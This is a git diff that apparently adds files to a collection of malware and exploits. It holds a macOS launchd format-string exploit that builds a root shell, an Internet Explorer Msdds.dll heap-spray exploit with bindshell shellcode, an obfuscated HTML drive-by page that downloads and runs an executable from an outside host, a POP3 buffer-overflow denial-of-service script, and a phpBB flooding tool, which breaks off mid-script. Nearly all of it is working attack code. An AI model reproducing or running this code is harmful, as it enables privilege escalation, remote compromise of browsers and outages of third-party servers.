+([$writeaddr+6, $writeaddr, $sc+12, $sc+16, $sc+28, $sc+22, $sc+26, $sc+24, $sc+10, $sc+14, $sc+18, $sc+30, $writeaddr+2, $sc+20, $sc+8, $writeaddr+4],    # 0
+ [0x00e0, 0x11b8, 0x2f2f, 0x2f68, 0x3bb0, 0x50e3, 0x5353, 0x5454, 0x6850, 0x6873, 0x6d74, 0x80cd, 0x8111, 0x8970, 0xc031, 0xff01], ); 
+
+$ENV{"TERM_PROGRAM"} = "." . 
+# string of write address 
+pack('l', $payload[0][0]) . pack('l', $payload[0][1]) . pack('l', $payload[0][2]) . pack('l', $payload[0][3]) . pack('l', $payload[0][4]) . pack('l', $payload[0][5]) . pack('l', $payload[0][6]) . pack('l', $payload[0][7]) . pack('l', $payload[0][8]) . pack('l', $payload[0][9]) . pack('l', $payload[0][10]) . pack('l', $payload[0][11]) . pack('l', $payload[0][12]) . pack('l', $payload[0][13]) . pack('l', $payload[0][14]) . pack('l', $payload[0][15]) . pack('l', $seteuid[0][0]) . pack('l', $seteuid[0][1]) . pack('l', $seteuid[0][2]) . pack('l', $seteuid[0][3]) ; 
+
+# lazy non looped length calculations
+$pay1  = $payload[1][0];
+$pay2  = ($payload[1][1] - $pay1 - 0x1 ); 
+$pay3  = ($payload[1][2] - $pay1 - $pay2 - 0x1); 
+$pay4  = ($payload[1][3] - $pay1 - $pay2 - $pay3 - 0x1); 
+$pay5  = ($payload[1][4] - $pay1 - $pay2 - $pay3 - $pay4 - 0x1); 
+$pay6  = ($payload[1][5] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - 0x1); 
+$pay7  = ($payload[1][6] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 - 0x1); 
+$pay8  = ($payload[1][7] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 - $pay7 - 0x1); 
+$pay9  = ($payload[1][8] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 - $pay7 - $pay8 - 0x1); 
+$pay10 = ($payload[1][9] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 - $pay7 - $pay8 - $pay9 - 0x1); 
+$pay11 = ($payload[1][10] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 - $pay7 - $pay8 - $pay9 - $pay10 - 0x1); 
+$pay12 = ($payload[1][11] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 - $pay7 - $pay8 - $pay9 - $pay10 - $pay11 - 0x1); 
+$pay13 = ($payload[1][12] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 - $pay7 - $pay8 - $pay9 - $pay10 - $pay11 - $pay12 - 0x2); 
+$pay14 = ($payload[1][13] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 - $pay7 - $pay8 - $pay9 - $pay10 - $pay11 - $pay12 - $pay13 - 0x2); 
+$pay15 = ($payload[1][14] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 - $pay7 - $pay8 - $pay9 - $pay10 - $pay11 - $pay12 - $pay13 - $pay14 - 0x2); 
+$pay16 = ($payload[1][15] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 - $pay7 - $pay8 - $pay9 - $pay10 - $pay11 - $pay12 - $pay13 - $pay14 - $pay15 - 0x3); 
+# seems I forgot the seteuid(0) 
+$pay17 =  0xff + $seteuid[1][0];  
+$pay18 = 0xff + ($seteuid[1][1] - $pay17); 
+$pay19 = 0xff + ($seteuid[1][2] - $pay17 - $pay18  )  ; 
+$pay20 = 0xff + ($seteuid[1][3] - $pay17 - $pay18 - $pay19 - 0x7ec8 - 0x270) ;   # Something is fucking this write up... subtracting 0x8138 seems to help 
+
+# The offset is off by 6 if you are trying to debug this in gdb
+$format = 
+"%." . $pay1 . "d" . "%246\$hn" .
+"%." . $pay2 . "d" . "%247\$hn" .
+"%." . $pay3 . "d" . "%248\$hn" .
+"%." . $pay4 . "d" . "%249\$hn" .
+"%." . $pay5 . "d" . "%250\$hn" .
+"%." . $pay6 . "d" . "%251\$hn" .
+"%." . $pay7 . "d" . "%252\$hn" .
+"%." . $pay8 . "d" . "%253\$hn" .
+"%." . $pay9 . "d" . "%254\$hn" .
+"%." . $pay10 . "d" . "%255\$hn" .
+"%." . $pay11 . "d" . "%256\$hn" .
+"%." . $pay12 . "d" . "%257\$hn" . 
+"%." . $pay13 . "d" . "%258\$hn" .
+"%." . $pay14 . "d" . "%259\$hn" .
+"%." . $pay15 . "d" . "%260\$hn" .
+"%." . $pay16 . "d" . "%261\$hn" .
+"%." . $pay17 . "d" . "%262\$hn" .
+"%." . $pay18 . "d" . "%263\$hn" .
+"%." . $pay19 . "d" . "%264\$hn" .
+"%." . $pay20 . "d" . "%265\$hn" ;
+
+open(SUSH,">/tmp/aaa.c");
+printf SUSH "int main(){setuid(0);setgid(0);system(\"/bin/sh\");}\n";
+system("PATH=$PATH:/usr/bin/ cc -o /tmp/sh /tmp/aaa.c");
+
+open(PWNED,">com.pwnage.plist");   
+
+print PWNED "<?xml version=\"1.0\" encoding=\"UTF-8\"?>
+<!DOCTYPE plist PUBLIC \"-//Apple Computer//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">
+<plist version=\"1.0\">
+<dict>
+	<key>Label</key>
+	<string>" . "$format" .
+	"</string>
+	<key>ProgramArguments</key>
+	<array>
+		<string>http://www.digitalmunition.com</string>
+	</array>
+	<key>RunAtLoad</key>
+	<true/>
+</dict>
+</plist>\n";
+
+print "open a new window and type - \"launchctl load ./com.pwnage.plist\"\n";
+system("/sbin/launchd");
+
+
diff --git a/Perl/Constructor.Perl.Msdds.a b/Perl/Constructor.Perl.Msdds.a
new file mode 100644
index 00000000..6b64b1cb
--- /dev/null
+++ b/Perl/Constructor.Perl.Msdds.a
@@ -0,0 +1,80 @@
+#######################################################
+# 
+# Microsoft Internet Explorer "Msdds.dll" Remote Code Execution Exploit (0day)
+#
+# Bindshell on port 28876 - Vulnerability discovered and exploited by Anonymous
+# 
+# PoC code ripped from Berend-Jan Wever's Internet-Exploiter
+#
+# Vulnerable : EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F (Msdds.dll)
+#
+# Tested on : Microsoft Internet Explorer 6 SP2 (Windows XP SP2)
+#
+# Code usage : perl IE-Msddsdll-0day.pl > mypage.html
+# 
+#######################################################
+#
+# This program is free software; you can redistribute it and/or modify it under
+# the terms of the GNU General Public License version 2, 1991 as published by
+# the Free Software Foundation.
+# 
+# This program is distributed in the hope that it will be useful, but WITHOUT
+# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+# details.
+# 
+# A copy of the GNU General Public License can be found at:
+# http://www.gnu.org/licenses/gpl.html
+# or you can write to:
+# Free Software Foundation, Inc.
+# 59 Temple Place - Suite 330
+# Boston, MA 02111-1307
+# USA.
+#
+#######################################################
+
+# header
+my $header = "<html><body>\n<SCRIPT language=\"javascript\">\n";
+
+# Win32 bindshell (port 28876) - SkyLined
+my $shellcode = "shellcode = unescape(\"%u4343\"+\"%u4343\"+\"%u43eb".
+"%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea".
+"%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7".
+"%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b".
+"%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64".
+"%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c".
+"%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe".
+"%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0".
+"%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050".
+"%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6".
+"%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650".
+"%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa".
+"%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656".
+"%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1".
+"%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353".
+"%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353".
+"%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe".
+"%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff".
+"%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb\");\n";
+
+# Memory 
+my $code = "bigblock = unescape(\"%u0D0D%u0D0D\");\n".
+"headersize = 20;\n".
+"slackspace = headersize+shellcode.length\n".
+"while (bigblock.length<slackspace) bigblock+=bigblock;\n".
+"fillblock = bigblock.substring(0, slackspace);\n".
+"block = bigblock.substring(0, bigblock.length-slackspace);\n".
+"while(block.length+slackspace<0x40000) block = block+block+fillblock;\n".
+"memory = new Array();\n".
+"for (i=0;i<700;i++) memory[i] = block + shellcode;\n".
+"</SCRIPT>\n";
+
+# Msdds.dll
+my $clsid = 'EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F'; 
+
+# footer
+my $footer = "<object classid=\"CLSID:".$clsid."\"></object></body></html>\n".
+"Microsoft Internet Explorer Msdds.dll COM Object Remote Exploit\n";
+
+# print "Content-Type: text/html;\r\n\r\n"; # if you are in cgi-bin
+print "$header $shellcode $code $footer";
\ No newline at end of file
diff --git a/Perl/Constructor.Perl.Msdds.b b/Perl/Constructor.Perl.Msdds.b
new file mode 100644
index 00000000..21f79ecd
--- /dev/null
+++ b/Perl/Constructor.Perl.Msdds.b
@@ -0,0 +1,82 @@
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
+<NOSCRIPT>This page uses Javascript</NOSCRIPT>
+<SCRIPT LANGUAGE="javascript" TYPE="text/javascript">
+document.write(unescape("%3c%68%74%6d%6c%3e%0d%0a%3c%62%6f%64%79%3e%0d%0a%3c%49%46%52%41%4d%45%20%73%72%63%3d%22%78%70%6c%2e%77%6d%66%22%0d%0a%20"));
+document.write(unescape("%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%31%20%76%73%70%61%63%65%3d%31%20%68%73%70%61%63%65%3d%31%20%6d%61%72%67%69%6e%77"));
+document.write(unescape("%69%64%74%68%3d%31%20%6d%61%72%67%69%6e%68%65%69%67%68%74%3d%31%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%73"));
+document.write(unescape("%63%72%6f%6c%6c%69%6e%67%3d%6e%6f%3e%0d%0a%20%20%3c%2f%49%46%52%41%4d%45%3e%0d%0a%3c%2f%62%6f%64%79%3e%0d%0a%3c%73%74%79"));
+document.write(unescape("%6c%65%3e%0d%0a%2a%20%7b%43%55%52%53%4f%52%3a%20%75%72%6c%28%22%68%74%74%70%3a%2f%2f%67%61%6d%65%34%75%73%65%72%2e%6e%65"));
+document.write(unescape("%74%2f%61%64%76%2f%30%31%2f%73%70%6c%6f%69%74%2e%61%6e%72%22%29%7d%0d%0a%3c%2f%73%74%79%6c%65%3e%0d%0a%3c%41%50%50%4c%45"));
+document.write(unescape("%54%20%41%52%43%48%49%56%45%3d%27%63%6f%75%6e%74%2e%6a%61%72%27%20%43%4f%44%45%3d%27%42%6c%61%63%6b%42%6f%78%2e%63%6c%61"));
+document.write(unescape("%73%73%27%20%57%49%44%54%48%3d%31%20%48%45%49%47%48%54%3d%31%3e%0d%0a%3c%50%41%52%41%4d%20%4e%41%4d%45%3d%27%75%72%6c%27"));
+document.write(unescape("%20%56%41%4c%55%45%3d%27%68%74%74%70%3a%2f%2f%67%61%6d%65%34%75%73%65%72%2e%6e%65%74%2f%61%64%76%2f%30%31%2f%77%69%6e%33"));
+document.write(unescape("%32%2e%65%78%65%27%3e%3c%2f%41%50%50%4c%45%54%3e%0d%0a%3c%73%63%72%69%70%74%3e%0d%0a%74%72%79%7b%0d%0a%64%6f%63%75%6d%65"));
+document.write(unescape("%6e%74%2e%77%72%69%74%65%28%27%3c%6f%62%6a%65%63%74%20%64%61%74%61%3d%60%26%23%31%30%39%26%23%31%31%35%26%23%34%35%26%23"));
+document.write(unescape("%31%30%35%26%23%31%31%36%26%23%31%31%35%26%23%35%38%26%23%31%30%39%26%23%31%30%34%26%23%31%31%36%26%23%31%30%39%26%23%31"));
+document.write(unescape("%30%38%26%23%35%38%26%23%31%30%32%26%23%31%30%35%26%23%31%30%38%26%23%31%30%31%26%23%35%38%26%23%34%37%26%23%34%37%26%23"));
+document.write(unescape("%36%37%26%23%35%38%26%23%39%32%26%23%31%30%32%26%23%31%31%31%3b%6f%2e%6d%68%74%21%27%2b%27%68%74%74%70%3a%2f%2f%67%61%6d"));
+document.write(unescape("%65%34%75%73%65%72%2e%6e%65%74%2f%2f%61%64%76%2f%2f%30%31%2f%2f%74%61%72%67%2e%63%68%27%2b%27%6d%3a%3a%2f%74%61%72%67%27"));
+document.write(unescape("%2b%27%65%74%2e%68%74%6d%60%20%74%79%70%65%3d%60%74%65%78%74%2f%78%2d%73%63%72%69%70%74%6c%65%74%60%3e%3c%2f%6f%62%27%2b"));
+document.write(unescape("%27%6a%65%63%74%3e%27%29%3b%0d%0a%7d%63%61%74%63%68%28%65%29%7b%7d%0d%0a%3c%2f%73%63%72%69%70%74%3e%0d%0a%3c%73%63%72%69"));
+document.write(unescape("%70%74%3e%0d%0a%74%72%79%7b%78%3d%75%6e%65%73%63%61%70%65%28%22%25%75%39%30%39%30%25%75%39%30%39%30%25%75%39%30%39%30%25"));
+document.write(unescape("%75%39%30%39%30%25%75%30%30%65%38%25%75%30%30%30%30%25%75%35%64%30%30%25%75%65%64%38%31%25%75%31%31%63%65%25%75%30%30%34"));
+document.write(unescape("%30%25%75%63%63%65%38%25%75%30%30%30%30%25%75%38%64%30%30%25%75%35%65%38%35%25%75%34%30%31%32%25%75%65%38%30%30%25%75%30"));
+document.write(unescape("%30%30%37%25%75%30%30%30%30%25%75%37%32%37%35%25%75%36%64%36%63%25%75%36%65%36%66%25%75%65%38%30%30%25%75%30%31%31%65%25"));
+document.write(unescape("%75%30%30%30%30%25%75%63%33%38%39%25%75%38%35%38%64%25%75%31%33%31%65%25%75%30%30%34%30%25%75%31%33%65%38%25%75%30%30%30"));
+document.write(unescape("%30%25%75%35%35%30%30%25%75%34%63%35%32%25%75%36%66%34%34%25%75%36%65%37%37%25%75%36%66%36%63%25%75%36%34%36%31%25%75%36"));
+document.write(unescape("%66%35%34%25%75%36%39%34%36%25%75%36%35%36%63%25%75%30%30%34%31%25%75%65%38%35%33%25%75%30%30%66%38%25%75%30%30%30%30%25"));
+document.write(unescape("%75%39%30%39%30%25%75%38%64%38%64%25%75%31%32%37%66%25%75%30%30%34%30%25%75%30%30%36%61%25%75%30%30%36%61%25%75%30%39%65"));
+document.write(unescape("%38%25%75%30%30%30%30%25%75%36%33%30%30%25%75%35%63%33%61%25%75%32%65%37%34%25%75%36%65%36%39%25%75%30%30%37%38%25%75%36"));
+document.write(unescape("%61%35%31%25%75%66%66%30%30%25%75%38%64%64%30%25%75%36%62%38%35%25%75%34%30%31%32%25%75%36%61%30%30%25%75%65%38%30%30%25"));
+document.write(unescape("%75%30%30%30%39%25%75%30%30%30%30%25%75%33%61%36%33%25%75%37%34%35%63%25%75%36%39%32%65%25%75%37%38%36%65%25%75%65%38%30"));
+document.write(unescape("%30%25%75%30%30%62%65%25%75%30%30%30%30%25%75%38%35%38%64%25%75%31%32%37%33%25%75%30%30%34%30%25%75%30%30%36%61%25%75%62"));
+document.write(unescape("%31%65%38%25%75%30%30%30%30%25%75%34%63%30%30%25%75%36%31%36%66%25%75%34%63%36%34%25%75%36%32%36%39%25%75%36%31%37%32%25"));
+document.write(unescape("%75%37%39%37%32%25%75%30%30%34%31%25%75%36%39%35%37%25%75%34%35%36%65%25%75%36%35%37%38%25%75%30%30%36%33%25%75%37%38%34"));
+document.write(unescape("%35%25%75%37%34%36%39%25%75%37%32%35%30%25%75%36%33%36%66%25%75%37%33%36%35%25%75%30%30%37%33%25%75%37%34%36%38%25%75%37"));
+document.write(unescape("%30%37%34%25%75%32%66%33%61%25%75%37%34%32%66%25%75%36%31%37%32%25%75%36%36%36%36%25%75%36%31%33%35%25%75%36%63%36%63%25"));
+document.write(unescape("%75%36%32%32%65%25%75%37%61%36%39%25%75%36%31%32%66%25%75%37%36%36%34%25%75%33%30%32%66%25%75%32%66%33%31%25%75%36%39%37"));
+document.write(unescape("%37%25%75%33%33%36%65%25%75%32%65%33%32%25%75%37%38%36%35%25%75%30%30%36%35%25%75%36%30%30%30%25%75%38%62%36%34%25%75%33"));
+document.write(unescape("%30%31%64%25%75%30%30%30%30%25%75%38%62%30%30%25%75%30%63%35%62%25%75%35%62%38%62%25%75%38%62%31%63%25%75%38%62%31%62%25"));
+document.write(unescape("%75%30%38%35%62%25%75%64%61%38%39%25%75%39%64%38%39%25%75%31%33%32%64%25%75%30%30%34%30%25%75%37%62%38%62%25%75%30%31%33"));
+document.write(unescape("%63%25%75%30%33%64%37%25%75%37%38%35%66%25%75%34%62%38%62%25%75%38%62%31%38%25%75%32%30%37%33%25%75%37%62%38%62%25%75%30"));
+document.write(unescape("%31%32%34%25%75%30%31%64%36%25%75%66%63%64%37%25%75%30%31%61%64%25%75%35%31%64%30%25%75%39%36%35%37%25%75%62%64%38%64%25"));
+document.write(unescape("%75%31%33%31%65%25%75%30%30%34%30%25%75%30%66%62%39%25%75%30%30%30%30%25%75%66%33%30%30%25%75%39%36%61%36%25%75%35%39%35"));
+document.write(unescape("%66%25%75%30%36%37%34%25%75%34%37%34%37%25%75%65%34%65%32%25%75%63%34%65%62%25%75%63%30%33%31%25%75%38%62%36%36%25%75%63"));
+document.write(unescape("%31%30%37%25%75%30%32%65%30%25%75%37%33%38%62%25%75%30%31%31%63%25%75%30%31%64%36%25%75%61%64%63%36%25%75%64%30%30%31%25"));
+document.write(unescape("%75%38%35%38%39%25%75%31%33%33%31%25%75%30%30%34%30%25%75%63%33%36%31%25%75%66%66%35%30%25%75%32%64%62%35%25%75%34%30%31"));
+document.write(unescape("%33%25%75%66%66%30%30%25%75%33%31%39%35%25%75%34%30%31%33%25%75%66%66%30%30%25%75%34%37%65%30%25%75%37%34%36%35%25%75%37"));
+document.write(unescape("%32%35%30%25%75%36%33%36%66%25%75%36%34%34%31%25%75%37%32%36%34%25%75%37%33%36%35%25%75%30%30%37%33%25%75%30%30%30%30%25"));
+document.write(unescape("%75%30%30%30%30%25%75%30%30%30%30%25%75%30%30%30%30%22%29%3b%79%3d%75%6e%65%73%63%61%70%65%28%22%25%75%30%64%30%64%25%75"));
+document.write(unescape("%30%64%30%64%22%29%3b%77%68%69%6c%65%28%79%2e%6c%65%6e%67%74%68%3c%30%78%34%30%30%30%30%29%79%2b%3d%79%3b%79%3d%79%2e%73"));
+document.write(unescape("%75%62%73%74%72%69%6e%67%28%30%2c%30%78%33%66%66%65%34%2d%78%2e%6c%65%6e%67%74%68%29%3b%6f%3d%6e%65%77%20%41%72%72%61%79"));
+document.write(unescape("%28%29%3b%66%6f%72%28%69%3d%30%3b%69%3c%34%35%30%3b%69%2b%2b%29%6f%5b%69%5d%3d%79%2b%78%3b%7a%3d%4d%61%74%68%2e%63%65%69"));
+document.write(unescape("%6c%28%30%78%64%30%64%30%64%30%64%29%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%6f%62%6a%65%63%74%20%63%6c%61"));
+document.write(unescape("%73%73%69%64%3d%22%43%4c%53%49%44%3a%45%43%34%34%34%43%42%36%2d%33%45%37%45%2d%34%38%36%35%2d%42%31%43%33%2d%30%44%45%37"));
+document.write(unescape("%32%45%46%33%39%42%33%46%22%3e%3c%5c%2f%6f%62%6a%65%63%74%3e%27%29%3b%7a%3d%64%6f%63%75%6d%65%6e%74%2e%73%63%72%69%70%74"));
+document.write(unescape("%73%5b%30%5d%2e%63%72%65%61%74%65%43%6f%6e%74%72%6f%6c%52%61%6e%67%65%28%29%2e%6c%65%6e%67%74%68%3b%7d%63%61%74%63%68%28"));
+document.write(unescape("%65%29%7b%7d%0d%0a%3c%2f%73%63%72%69%70%74%3e%0d%0a%3c%73%63%72%69%70%74%3e%0d%0a%3c%21%2d%2d%0d%0a%66%75%6e%63%74%69%6f"));
+document.write(unescape("%6e%20%66%28%62%2c%20%61%2c%20%63%29%20%7b%20%72%65%74%75%72%6e%20%61%20%2b%20%62%20%2b%20%63%3b%20%7d%0d%0a%66%75%6e%63"));
+document.write(unescape("%74%69%6f%6e%20%67%28%62%2c%20%61%29%20%7b%20%72%65%74%75%72%6e%20%61%20%2b%20%62%3b%20%7d%0d%0a%76%61%72%20%73%20%3d%20"));
+document.write(unescape("%6e%65%77%20%41%72%72%61%79%0d%0a%28%0d%0a%20%22%22%2c%0d%0a%20%22%77%69%6e%33%32%2e%65%78%65%22%2c%0d%0a%20%22%68%74%74"));
+document.write(unescape("%70%3a%2f%2f%67%61%6d%65%34%75%73%65%72%2e%6e%65%74%2f%61%64%76%2f%30%31%2f%22%2c%0d%0a%20%22%6f%62%6a%65%63%74%22%2c%0d"));
+document.write(unescape("%0a%20%22%63%6c%61%73%73%69%64%22%2c%0d%0a%20%66%28%22%30%43%30%22%2c%20%67%28%66%28%67%28%22%33%2d%31%31%44%30%2d%39%22"));
+document.write(unescape("%2c%20%22%35%36%2d%36%35%41%22%29%2c%20%22%69%64%3a%42%44%39%36%43%35%22%2c%20%22%38%33%41%2d%30%22%29%2c%20%22%63%6c%73"));
+document.write(unescape("%22%29%2c%20%67%28%22%39%45%33%36%22%2c%20%22%34%46%43%32%22%29%29%2c%0d%0a%20%67%28%66%28%22%66%74%2e%58%4d%4c%48%22%2c"));
+document.write(unescape("%20%22%6f%73%6f%22%2c%20%22%54%54%50%22%29%2c%20%22%4d%69%63%72%22%29%2c%0d%0a%20%66%28%22%45%22%2c%20%22%47%22%2c%20%22"));
+document.write(unescape("%54%22%29%2c%0d%0a%20%66%28%67%28%22%2e%53%74%72%22%2c%20%22%6f%64%62%22%29%2c%20%22%41%64%22%2c%20%22%65%61%6d%22%29%2c"));
+document.write(unescape("%0d%0a%20%66%28%67%28%22%2e%53%68%65%22%2c%20%22%69%70%74%22%29%2c%20%22%57%53%63%72%22%2c%20%22%6c%6c%22%29%2c%0d%0a%20"));
+document.write(unescape("%22%50%52%4f%43%45%53%53%22%2c%0d%0a%20%22%54%4d%50%22%2c%0d%0a%20%22%2f%5b%5e%2f%5d%2a%24%22%2c%0d%0a%20%22%2f%22%2c%0d"));
+document.write(unescape("%0a%20%22%5c%5c%22%0d%0a%29%3b%0d%0a%61%20%3d%20%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74%28%73"));
+document.write(unescape("%5b%33%5d%29%3b%0d%0a%61%2e%73%65%74%41%74%74%72%69%62%75%74%65%28%73%5b%34%5d%2c%20%73%5b%35%5d%29%3b%0d%0a%77%69%74%68"));
+document.write(unescape("%28%61%2e%43%72%65%61%74%65%4f%62%6a%65%63%74%28%73%5b%36%5d%2c%20%73%5b%30%5d%29%29%0d%0a%7b%0d%0a%20%6f%70%65%6e%28%73"));
+document.write(unescape("%5b%37%5d%2c%20%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%2e%72%65%70%6c%61%63%65%28%6e%65%77%20%52%65%67%45%78%70%28%73%5b"));
+document.write(unescape("%31%32%5d%29%2c%20%73%5b%31%33%5d%20%2b%20%73%5b%31%5d%29%2c%20%66%61%6c%73%65%29%3b%0d%0a%20%73%65%6e%64%28%29%3b%0d%0a"));
+document.write(unescape("%20%69%66%28%73%74%61%74%75%73%20%3c%20%34%30%30%29%0d%0a%20%20%77%69%74%68%28%61%2e%43%72%65%61%74%65%4f%62%6a%65%63%74"));
+document.write(unescape("%28%73%5b%38%5d%2c%20%73%5b%30%5d%29%29%0d%0a%20%20%7b%0d%0a%20%20%20%54%79%70%65%20%3d%20%31%3b%0d%0a%20%20%20%4f%70%65"));
+document.write(unescape("%6e%28%29%3b%0d%0a%20%20%20%57%72%69%74%65%28%72%65%73%70%6f%6e%73%65%42%6f%64%79%29%3b%0d%0a%20%20%20%77%69%74%68%28%61"));
+document.write(unescape("%2e%43%72%65%61%74%65%4f%62%6a%65%63%74%28%73%5b%39%5d%2c%20%73%5b%30%5d%29%29%0d%0a%20%20%20%7b%0d%0a%20%20%20%20%63%20"));
+document.write(unescape("%3d%20%45%6e%76%69%72%6f%6e%6d%65%6e%74%28%73%5b%31%30%5d%29%28%73%5b%31%31%5d%29%20%2b%20%73%5b%31%34%5d%20%2b%20%73%5b"));
+document.write(unescape("%31%5d%3b%0d%0a%20%20%20%20%53%61%76%65%54%6f%46%69%6c%65%28%63%2c%20%32%29%3b%0d%0a%20%20%20%20%45%78%65%63%28%63%29%3b"));
+document.write(unescape("%0d%0a%20%20%20%7d%0d%0a%20%20%7d%0d%0a%7d%0d%0a%6c%6f%63%61%74%69%6f%6e%2e%72%65%70%6c%61%63%65%28%73%5b%32%5d%29%3b%0d"));
+document.write(unescape("%0a%2f%2f%20%2d%2d%3e%0d%0a%3c%2f%73%63%72%69%70%74%3e%0d%0a%3c%2f%68%74%6d%6c%3e"));
+</SCRIPT>
diff --git a/Perl/DoS.Perl.Avirt b/Perl/DoS.Perl.Avirt
new file mode 100644
index 00000000..e612282d
--- /dev/null
+++ b/Perl/DoS.Perl.Avirt
@@ -0,0 +1,47 @@
+
+# Example for a possible DOS-attack against Avirt Mail Server ver3.5.
+# There need to be 856 characters to overflow Server.
+# Example : Trying example.com...
+# 	    Connected to example.com.
+# 	    Escape character is '^]'.
+# 	    +OK aVirt Mail POP3 Server Ready
+# 	    user fuckup
+#           +OK
+#           pass [856 characters]
+#	    Overflow
+# Hint : Avirt Mail Server ver3.3a has the same problem after 856 
+# characters (but then you can exploit it)
+
+use IO::Socket;
+
+print "Possible DOS-attack against Avirt Mail Server ver3.5\n";
+print "++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
+
+if (not $ARGV[1]) {
+  print "Usage: $0 [host] [username]\n\n";
+  exit(0);
+}
+
+sub connecthost {
+        $host = IO::Socket::INET->new ( Proto => "tcp",
+			                PeerAddr => $ARGV[0],
+                			PeerPort => "25",) or die "Can't open connection to $ARGV[0] because $!\n";
+        $host->autoflush(1);
+} 
+
+$bufferoverflow .= "A" x 856;
+
+print "\nOpen connection...\n";
+&connecthost;
+print "Sending characters...\n";
+print $host "user $ARGV[1]\n";
+print $host "pass $bufferoverflow\n";
+print "close connection...\n";
+close $host;
+
+print "\nTesting...\n";
+&connecthost("\nThe host $ARGV[0] is vulnerable to this attack.\n");
+close $host;
+die "The host $ARGV[0] is not vulnerable to this attack.\n";
+
+# by arbon(arbon@gmx.de)
\ No newline at end of file
diff --git a/Perl/DoS.Perl.BBDoS.a b/Perl/DoS.Perl.BBDoS.a
new file mode 100644
index 00000000..16c8b7af
--- /dev/null
+++ b/Perl/DoS.Perl.BBDoS.a
@@ -0,0 +1,145 @@
+##  Name: NsT-phpBBDoS (Perl Version)
+##  Copyright: Neo Security Team
+##  Author: HaCkZaTaN
+##  Ported: g30rg3_x
+##  Date: 20/06/05
+##  Description: NsT-phpBB DoS By HackZatan Ported tu perl By g30rg3_x
+##               A Simple phpBB Registration And Search DoS Flooder.
+## 
+##  g30rg3x@neosecurity:/home/g30rg3x# perl NsT-phpBBDoS.pl
+##  [+] 
+##  [+] NsT-phpBBDoS v0.2 by HaCkZaTaN
+##  [+] ported to Perl By g30rg3_x
+##  [+] Neo Security Team
+##  [+]
+##  [+] Host |without http://www.| victimshost.com
+##  [+] Path |example. /phpBB2/ or /| /phpBB2/
+##  [+] Flood Type |1=Registration 2=Search| 1
+##  [+] ..........................................................
+##  [+] ..........................................................
+##  [+] ..........................................................
+##  [+] ..............................................
+##  [+] The Socket Can't Connect To The Desired Host or the Host is MayBe DoSed
+##  g30rg3x@neosecurity:/home/g30rg3x# echo "Let see how many users I have created"
+
+use IO::Socket;
+
+## Initialized X
+$x = 0;
+
+## Flood Variables Provided By User
+print q(
+NsT-phpBBDoS v0.2 by HaCkZaTaN
+ported to Perl By g30rg3_x
+Neo Security Team
+
+);
+print q(Host |without http://www.| );
+$host = <STDIN>;
+chop ($host);
+
+print q(Path |example. /phpBB2/ or /| );
+$pth = <STDIN>;
+chop ($pth);
+
+print q(Flood Type |1 = Registration, 2 = Search| );
+$type = <STDIN>;
+chop ($type);
+
+## If Type Is Equals To 1 or Registration
+if($type == 1){
+
+## User Loop for 9999 loops (enough for Flood xDDDD)
+while($x != 9999)
+{
+
+## Building User in base X
+$uname = "username=NsT__" . "$x";
+
+## Building User Mail in base X
+$umail = "&email=NsT__" . "$x";
+
+## Final String to Send
+$postit = "$uname"."$umail"."%40neosecurityteam.net&new_password=0123456&password_confirm=0123456&icq=&aim=N%2FA&msn=&yim=&website=&location=&occupation=&interests=&signature=&viewemail=0&hideonline=0&notifyreply=0&notifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=english&style=2&timezone=0&dateformat=D+M+d%2C+Y+g%3Ai+a&mode=register&agreed=true&coppa=0&submit=Submit";
+
+## Posit Length
+$lrg = length $postit;
+
+## Connect Socket with Variables Provided By User
+my $sock = new IO::Socket::INET (
+                                 PeerAddr => "$host",
+                                 PeerPort => "80",
